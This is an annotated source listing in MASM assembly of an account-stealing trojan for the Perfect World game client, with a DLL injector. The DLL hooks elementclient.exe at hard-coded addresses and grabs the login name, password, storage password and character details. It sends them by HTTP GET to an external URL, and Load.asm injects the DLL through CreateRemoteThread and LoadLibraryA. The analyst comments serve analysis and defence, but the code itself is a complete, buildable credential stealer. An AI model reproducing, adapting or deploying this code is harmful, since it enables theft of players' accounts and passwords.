完美世界截取和发信部分代码 — Perfect World (完美世界) game-client credential capture and exfiltration code, partial listing. Analyst note: the two listings below are an account-stealing payload DLL (Dll.asm) and the CreateRemoteThread/LoadLibraryA injector that loads it into the game client (Load.asm). The hook and data addresses are hard-coded, so the payload matches one specific build of elementclient.exe; the URL in szUrl is the exfiltration endpoint and the most useful network indicator.
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Dll.asm
; Test DLL intended to be injected into another process and executed there
; (in practice: the payload that hooks elementclient.exe and reports captured credentials)
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Build and link with nmake or with the following commands:
; ml /c /coff DLL.asm
; Link /subsystem:windows /Dll DLL.obj
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.386
.model flat, stdcall
option casemap :none
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Include file definitions
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include libc.inc
includelib libc.lib
include Wininet.inc
includelib Wininet.lib
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.data?
hProcess dd ?                        ; handle from GetCurrentProcess; used by DllEntry's self-patching WriteProcessMemory calls
dwMoney dd ?                         ; in-game money read by GetPlayerInfo; sent as m= in the report URL
dwLevel dd ?                         ; character level read by GetPlayerInfo; sent as l=
dwTemp1 dd ?                         ; scratch pointer used by GetUserNameAndPassWord
hSession dd ?                        ; WinInet session handle from InternetOpenA (never closed in the visible code)
hRequest dd ?                        ; declared but not referenced anywhere in the visible code
.data
szBuf db 0,0,0,0,0,0,0,0,0,0         ; patch scratch: DllEntry assembles E9 + rel32 (JMP near) here, then writes 5 bytes into the client
szServer1 db 20 dup ( 0 )            ; server name copied from 008E5754h by GetPlayerInfo and sent as s=; the copy loop has no length check
szServer2 db 20 dup ( 0 )            ; never written: the WideCharToMultiByte conversion into it is commented out in GetPlayerInfo
szFileName db 260 dup ( 0 )          ; host process image path from GetModuleFileName
szTargetName db 'elementclient.exe',0   ; the hooks are installed only when the host image has this file name
szAgent db 'WinInet',0               ; User-Agent handed to InternetOpenA
szUrl db 'http://www.79725.com/wm/lin.asp',0   ; exfiltration endpoint (network IOC): captured data is sent here as an HTTP GET
szMailFmt db '%s?s=%s&u=%s&p=%s&sp=%s&r=%s&l=%d&m=%d',0
; query-string layout, from the wsprintf calls in _SendMail1/_SendMail2:
;   s=server (szServer1)  u=username (szUserName)  p=password (szPassWord)
;   sp=storage password (szStoragePW, or the literal "UnKnown")  r=character name (szPlayerName1)
;   l=level (dwLevel)  m=money (dwMoney)
szBuf_Url db 260 dup (0)             ; wsprintf target for the full URL; wsprintf takes no buffer size, so long fields can overrun it
szUserName db 30 dup ( 0 )           ; login name captured by GetUserNameAndPassWord (unbounded strcpy-style copy)
szPassWord db 30 dup ( 0 )           ; login password captured by GetUserNameAndPassWord (unbounded copy)
szStoragePW db 30 dup ( 0 )          ; storage password captured by GetStoragePW (unbounded copy)
szPlayerName db 60 dup ( 0 )         ; character name, copied as wide chars by GetPlayerInfo; never re-zeroed between copies
szPlayerName1 db 60 dup ( 0 )        ; ANSI form of szPlayerName produced by WideCharToMultiByte
.const
szConfirm db 'confirm',0             ; "conf" as a little-endian dword is 666E6F63h, the value GetStoragePW compares against
szUnKnown db 'UnKnown',0             ; placeholder sent for sp= when the storage password has not been captured (_SendMail2)
szNum1 db '1',0                      ; text of the MessageBox shown on DLL_PROCESS_ATTACH (leftover debug output, a visible tell)
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.code
; Fields reported by the _SendMail* threads (see szMailFmt):
;   szUserName
;   szPassWord
;   szStoragePW
;   szPlayerName (sent as its ANSI copy szPlayerName1)
; format: %s?s=%s&u=%s&p=%s&sp=%s&r=%s&l=%d&m=%d
;-----------------------------------------------------------------------
; _SendMail1 - exfiltration thread, full report (includes the storage password).
; Started by GetStoragePW via CreateThread with a NULL parameter.
; Builds szUrl?s=<szServer1>&u=<szUserName>&p=<szPassWord>&sp=<szStoragePW>
;        &r=<szPlayerName1>&l=<dwLevel>&m=<dwMoney>
; into szBuf_Url and requests it with InternetOpenUrlA (plain HTTP GET; INTERNET_FLAG_RELOAD
; forces a fetch from the origin server instead of the cache). The response is ignored and
; neither hSession nor the returned request handle is ever closed.
; NOTE(review): a thread start routine receives one stdcall parameter, but this proc is
; declared without it and exits with a plain `ret`; presumably harmless because the thread
; ends as soon as the routine returns.
;-----------------------------------------------------------------------
_SendMail1 proc
invoke InternetOpenA,offset szAgent,INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0   ; system (registry) proxy settings
mov hSession, eax
invoke wsprintf,offset szBuf_Url,offset szMailFmt,offset szUrl,offset szServer1,offset szUserName,offset szPassWord, \
offset szStoragePW,offset szPlayerName1,dwLevel,dwMoney
; ^ wsprintf has no size argument: szBuf_Url is 260 bytes, the inputs are not length-limited
invoke InternetOpenUrlA, hSession, offset szBuf_Url, 0, 0, INTERNET_FLAG_RELOAD, 0   ; fire-and-forget GET
ret
_SendMail1 Endp
;-----------------------------------------------------------------------
; _SendMail2 - exfiltration thread, report without the storage password.
; Started by GetPlayerInfo via CreateThread with a NULL parameter.
; Identical to _SendMail1 except that the sp= field carries the literal "UnKnown"
; (szUnKnown) instead of szStoragePW. Same leaks: hSession and the request handle
; are never closed; the response is ignored.
;-----------------------------------------------------------------------
_SendMail2 proc
invoke InternetOpenA,offset szAgent,INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0   ; system (registry) proxy settings
mov hSession, eax
invoke wsprintf,offset szBuf_Url,offset szMailFmt,offset szUrl,offset szServer1,offset szUserName,offset szPassWord, \
offset szUnKnown,offset szPlayerName1, dwLevel, dwMoney
; ^ sp= is the placeholder "UnKnown" here; no size limit on szBuf_Url (260 bytes)
invoke InternetOpenUrlA, hSession, offset szBuf_Url, 0, 0, INTERNET_FLAG_RELOAD, 0   ; fire-and-forget GET
ret
_SendMail2 Endp
;-------------------------------------------------------------------------------
;-----------------------------------------------------------------------
; GetStoragePW - inline hook body, reached by the JMP that DllEntry writes at 00459A24h
; inside elementclient.exe. It is jumped to, not called: control arrives with the host
; function's registers and stack, and the final `ret` returns to whatever return address
; is on top of the host's stack (presumably leaving the hooked function; the five
; overwritten bytes are never executed).
; Expected host state (inferred from the checks below, not verifiable here):
;   ebx == ebp, and ebx points at memory beginning with the text "conf"
;   edi  -> NUL-terminated ANSI string that is copied out as the storage password
; Side effects: zeroes and fills szStoragePW, then starts _SendMail1 (full report).
; The `mov ebp, offset szConfirm` is not used by the comparison that follows (it tests
; [ebx]); its only effect is that the host sees ebp changed after the `ret`.
;-----------------------------------------------------------------------
GetStoragePW proc
.if ebx == ebp
mov ebp, offset szConfirm
.if dword ptr [ebx] == 666e6f63h                    ; bytes 63 6F 6E 66 = "conf" in memory
invoke RtlZeroMemory,offset szStoragePW,sizeof szStoragePW
pushad
mov esi, offset szStoragePW
mov al, [edi]
.while( al )                                        ; strcpy-style: no check against the 30-byte buffer
mov [esi], al
inc edi
inc esi
mov al, [edi]
.endw
popad
invoke CreateThread,NULL,0,offset _SendMail1, NULL, 0, 0   ; thread handle is discarded (leaked)
.endif
.endif
ret
GetStoragePW Endp
; Pointer chain inside elementclient.exe (hard-coded for one client build):
; money: [[[8e4dbc]+1c]+20]+4FC
; level: [[[8e4dbc]+1c]+20]+448
; name:  [[[[8e4dbc]+1c]+20]+5c8]   (pointer to a wide-char string)
;-----------------------------------------------------------------------
; GetPlayerInfo - inline hook body, reached by the JMP that DllEntry writes at 0044E811h.
; Walks a fixed pointer chain in the game client (absolute addresses, so this only fits
; one particular client build):
;   base  = [[[08E4DBCh]+1Ch]+20h]
;   money = [base+4FCh]   level = [base+448h]   name = wide string at [base+5C8h]
; and reads the server name from 008E5754h with the same copy loop.
; Fills dwMoney, dwLevel, szPlayerName (raw), szPlayerName1 (ANSI), szServer1, then
; starts _SendMail2 (report with sp=UnKnown).
; Stack handling: only eax is pushed here, yet the exit pops eax, esi, ebp and does
; `retn 4`. The extra pops and the 4-byte argument cleanup presumably reproduce the
; epilogue of the host function whose bytes were overwritten — TODO confirm against the
; client. esi and ebp are clobbered freely on that assumption.
;-----------------------------------------------------------------------
GetPlayerInfo proc
mov esi, 08e4dbch
mov esi, [esi]
mov esi, [esi+01ch]
mov esi, [esi+020h]                ; esi = base object
add esi, 04FCh
mov ebp, [esi]
mov dwMoney,ebp                    ; m= field
sub esi, 04FCh
add esi, 0448h
mov ebp, [esi]
mov dwLevel,ebp                    ; l= field
sub esi, 0448h
add esi, 05C8h
mov ebp, [esi]                     ; ebp -> character name (wide chars: see the WideCharToMultiByte below)
push eax
mov esi, offset szPlayerName
mov ax, [ebp]
.while( ax )                       ; copies a 16-bit word but advances one byte per step, so every
mov [esi], ax                      ; byte is written twice and the loop stops at two consecutive NUL
inc ebp                            ; bytes (the wide terminator). The terminator itself is not
inc esi                            ; written (relies on the buffer still being zero past the copy)
mov ax, [ebp]                      ; and there is no bound on the 60-byte buffer.
.endw
mov ebp, 008E5754h                 ; server name, same copy loop into szServer1 (20 bytes, unbounded)
mov esi, offset szServer1
mov ax, [ebp]
.while( ax )
mov [esi], ax
inc ebp
inc esi
mov ax, [ebp]
.endw
; The server-name conversion is disabled, so szServer1 is passed to wsprintf's %s as-is.
; If the data at 008E5754h is wide-char (as the disabled conversion suggests), %s stops at
; the first zero byte and only the first character reaches the report — TODO confirm.
;invoke WideCharToMultiByte, CP_ACP, 0, offset szServer1, -1, 0, 0, 0, 0
;invoke WideCharToMultiByte, CP_ACP, 0, offset szServer1, -1, offset szServer2, eax, 0, 0
invoke WideCharToMultiByte, CP_ACP, 0, offset szPlayerName, -1, 0, 0, 0, 0     ; eax = required ANSI length
invoke WideCharToMultiByte, CP_ACP, 0, offset szPlayerName, -1, offset szPlayerName1, eax, 0, 0
invoke CreateThread,NULL,0,offset _SendMail2, NULL, 0, 0   ; thread handle is discarded (leaked)
pop eax
pop esi                            ; these two pops and retn 4 belong to the host function's epilogue (see header)
pop ebp
retn 4
GetPlayerInfo Endp
;-----------------------------------------------------------------------
; _SleepThread - thread routine: sleeps 600000 ms (10 minutes) and returns 1.
; DllEntry creates it with CREATE_SUSPENDED and nothing in the visible code resumes it,
; so as written it never runs. _lParam is unused.
;-----------------------------------------------------------------------
_SleepThread proc _lParam
invoke Sleep, 600000
mov eax, 1
ret
_SleepThread Endp
;-----------------------------------------------------------------------
; GetUserNameAndPassWord - inline hook body, reached by the JMP DllEntry writes at 0058B950h.
; Reads two pointers from the host function's stack frame and copies the NUL-terminated
; ANSI strings they point to into szUserName and szPassWord (no length check; both buffers
; are 30 bytes). Nothing is sent from here: the values sit in the globals until
; GetStoragePW or GetPlayerInfo fires a report.
; Stack offsets: after the local `push ebp`, [esp+0Ch] and [esp+10h] are the dwords at
; original esp+8 and esp+0Ch. Which arguments of the hooked function those are, and why
; the exit uses `retn 01Ch` (28 bytes of caller arguments popped), can only be confirmed
; against the client — presumably the hooked function's own stdcall epilogue is reproduced.
; Registers are preserved around each copy with pushad/popad.
;-----------------------------------------------------------------------
GetUserNameAndPassWord proc
push ebp
mov ebp, [esp+0Ch]                 ; original esp+8: pointer to the string copied into szUserName
mov dwTemp1,ebp
pop ebp
invoke RtlZeroMemory,offset szUserName,sizeof szUserName
invoke RtlZeroMemory,offset szPassWord,sizeof szPassWord
;--------------------------------------------------- copy username
pushad
mov ebp, dwTemp1
mov esi, offset szUserName
mov al, [ebp]
.while( al )                       ; strcpy-style, unbounded (30-byte buffer)
mov [esi], al
inc ebp
inc esi
mov al, [ebp]
.endw
popad
;---------------------------------------------------
push ebp
mov ebp, [esp+10h]                 ; original esp+0Ch: pointer to the string copied into szPassWord
mov dwTemp1,ebp
pop ebp
;--------------------------------------------------- copy password
pushad
mov ebp, dwTemp1
mov esi, offset szPassWord
mov al, [ebp]
.while( al )                       ; strcpy-style, unbounded (30-byte buffer)
mov [esi], al
inc ebp
inc esi
mov al, [ebp]
.endw
popad
;----------------------------------------------------
retn 01Ch                          ; stdcall cleanup of 28 bytes, on behalf of the hooked function (see header)
GetUserNameAndPassWord Endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;-----------------------------------------------------------------------
; DllEntry - DllMain. On DLL_PROCESS_ATTACH it:
;   1. shows a MessageBox with the text "1" (leftover debug output; also a visible tell);
;   2. gets the host process image path and compares its file name, case-insensitively,
;      with "elementclient.exe" — the patches below are applied only in that process;
;   3. installs three inline hooks by overwriting 5 bytes at fixed addresses with
;      E9 rel32 (JMP near), rel32 = hook - (patch address + 5):
;        00459A24h -> GetStoragePW
;        0044E811h -> GetPlayerInfo
;        0058B950h -> GetUserNameAndPassWord
;      and writes the single byte 33h at 00439C74h (33h is the opcode of XOR r32,r/m32;
;      which instruction it replaces is not visible here — TODO confirm in the client);
;   4. creates _SleepThread suspended and never resumes it.
; All addresses are hard-coded, so this fits one specific client build. The writes go
; through WriteProcessMemory on the process's own handle (no VirtualProtect; the API is
; relied on to make the code pages writable), and none of their results are checked.
; NOTE(review): MessageBox and CreateThread are called from DllMain, i.e. under the
; loader lock. Always returns TRUE; pushad/popad preserve the loader's registers.
;-----------------------------------------------------------------------
DllEntry proc _hInstance,_dwReason,_dwReserved
pushad
.if _dwReason == DLL_PROCESS_ATTACH
invoke MessageBox, NULL, offset szNum1, NULL, MB_ICONINFORMATION       ; debug artifact: pops "1"
invoke GetModuleFileName, 0, offset szFileName, 0103h                  ; hModule 0 = host exe; 0103h = 259 chars
invoke strrchr, offset szFileName, 05Ch                                ; 05Ch = '\'; eax -> last backslash
inc eax                                                                ; -> file name; no NULL check: if strrchr found no '\', eax becomes 1 and _strcmpi faults
invoke _strcmpi, eax, offset szTargetName
.if eax == 0
mov eax, offset szBuf
mov byte ptr [eax], 0E9h                                               ; JMP rel32 opcode
mov ebx, offset GetStoragePW
sub ebx, 00459A29h                                                     ; rel32 = target - (00459A24h + 5)
mov dword ptr [eax+1], ebx
invoke GetCurrentProcess
mov hProcess, eax
invoke WriteProcessMemory, eax, 00459A24h, offset szBuf, 5, 0
mov eax, offset szBuf                                                  ; szBuf[0] is still E9h
mov ebx, offset GetPlayerInfo
sub ebx, 0044E816h                                                     ; rel32 = target - (0044E811h + 5)
mov dword ptr [eax+1], ebx
invoke WriteProcessMemory, hProcess, 0044E811h, offset szBuf, 5, 0
mov eax, offset szBuf
mov ebx, offset GetUserNameAndPassWord
sub ebx, 0058B955h                                                     ; rel32 = target - (0058B950h + 5)
mov dword ptr [eax+1], ebx
invoke WriteProcessMemory, hProcess, 0058B950h, offset szBuf, 5, 0
mov eax, offset szBuf
mov byte ptr [eax], 033h                                               ; one-byte patch, see header
invoke WriteProcessMemory, hProcess, 00439C74h, offset szBuf, 1, 0
invoke CreateThread,NULL,0,offset _SleepThread,NULL, CREATE_SUSPENDED, 0   ; never resumed in this file
.endif
.endif
popad
mov eax,TRUE
ret
DllEntry Endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
End DllEntry
exe (Load.asm — the injector that loads Dll.dll into the running game client)
*************************************************
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Load.asm
; Injects a DLL into a remote process and runs it there using the remote-thread API
; (CreateRemoteThread with LoadLibraryA as the thread start routine)
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Build and link with nmake or with the following commands:
; ml /c /coff Load.asm
; rc Load.rc
; Link /subsystem:windows Load.obj Load.res
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.386
.model flat, stdcall
option casemap :none
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Include file definitions
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Data segment
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.data?
dwProcessID dd ?                  ; PID of the window's owning process, filled by GetWindowThreadProcessId
dwThreadID dd ?                   ; thread id returned by GetWindowThreadProcessId (stored, then unused)
hProcess dd ?                     ; OpenProcess handle (CREATE_THREAD | VM_OPERATION | VM_WRITE)
lpLoadLibrary dd ?                ; address of kernel32!LoadLibraryA resolved in THIS process, reused as the remote start address
lpDllName dd ?                    ; buffer allocated in the target that receives the DLL path
szMyDllFull db MAX_PATH dup (?)   ; "<current directory>\Dll.dll"
.const
szErrOpen db '无法打开远程线程!',0   ; "Cannot open remote thread!" — shown when OpenProcess fails
szDesktopClass db 'ElementClient Window',0   ; window class used to locate the game client
szDesktopWindow db 'Element Client',0        ; window title used to locate the game client
; (the "Desktop" names are presumably carried over from an Explorer-targeting injector example)
szDllKernel db 'Kernel32.dll',0
szLoadLibrary db 'LoadLibraryA',0
szMyDll db '\Dll.dll',0                      ; payload file name appended to the current directory
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Code segment
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.code
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;-----------------------------------------------------------------------
; start - entry point. Classic CreateRemoteThread + LoadLibraryA injector:
;   1. builds "<current directory>\Dll.dll" (the CURRENT directory, not the injector's own
;      directory, so the payload path depends on where the injector was started from);
;   2. resolves LoadLibraryA in this process and reuses that address as the remote thread
;      start — this only works while kernel32 is mapped at the same base in the target;
;   3. finds the game window by class/title, takes its PID and opens the process;
;   4. allocates MAX_PATH bytes in the target, copies the path over and runs
;      LoadLibraryA(path) there, which triggers Dll.asm's DllEntry inside the client.
; FindWindow's result is not checked: with a NULL hwnd the PID lookup fails, dwProcessID
; presumably keeps its zero initial value, OpenProcess fails and the error box is shown.
; The remote thread handle is closed right away; WriteProcessMemory and CreateRemoteThread
; results are not checked.
;-----------------------------------------------------------------------
start:
;********************************************************************
; Setup: build the DLL's full path and resolve the LoadLibraryA address
;********************************************************************
invoke GetCurrentDirectory,MAX_PATH,addr szMyDllFull
invoke lstrcat,addr szMyDllFull,addr szMyDll               ; szMyDllFull = cwd + "\Dll.dll"
invoke GetModuleHandle,addr szDllKernel
invoke GetProcAddress,eax,offset szLoadLibrary
mov lpLoadLibrary,eax                                      ; local address, assumed identical in the target
;********************************************************************
; Find the game client window, get its process ID and open the process
; (original comment said "file manager window" — leftover from the example this was based on)
;********************************************************************
invoke FindWindow,addr szDesktopClass,addr szDesktopWindow ; no NULL check on the result
invoke GetWindowThreadProcessId,eax,offset dwProcessID
mov dwThreadID,eax
invoke OpenProcess,PROCESS_CREATE_THREAD or PROCESS_VM_OPERATION or \
PROCESS_VM_WRITE,FALSE,dwProcessID                         ; minimum rights for VirtualAllocEx/WriteProcessMemory/CreateRemoteThread
.if eax
mov hProcess,eax
;********************************************************************
; Allocate space in the target, copy the DLL path there, then start a LoadLibrary thread
;********************************************************************
invoke VirtualAllocEx,hProcess,NULL,MAX_PATH,MEM_COMMIT,PAGE_READWRITE
.if eax
mov lpDllName,eax
invoke WriteProcessMemory,hProcess,\
eax,offset szMyDllFull,MAX_PATH,NULL                       ; copies the whole MAX_PATH buffer, not just the string
invoke CreateRemoteThread,hProcess,NULL,0,lpLoadLibrary,\
lpDllName,0,NULL                                           ; remote LoadLibraryA(lpDllName)
invoke CloseHandle,eax                                     ; thread handle dropped; a NULL here (failure) is silently passed to CloseHandle
.endif
invoke CloseHandle,hProcess
.else
invoke MessageBox,NULL,addr szErrOpen,NULL,MB_OK or MB_ICONWARNING
.endif
invoke ExitProcess,NULL
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
end start

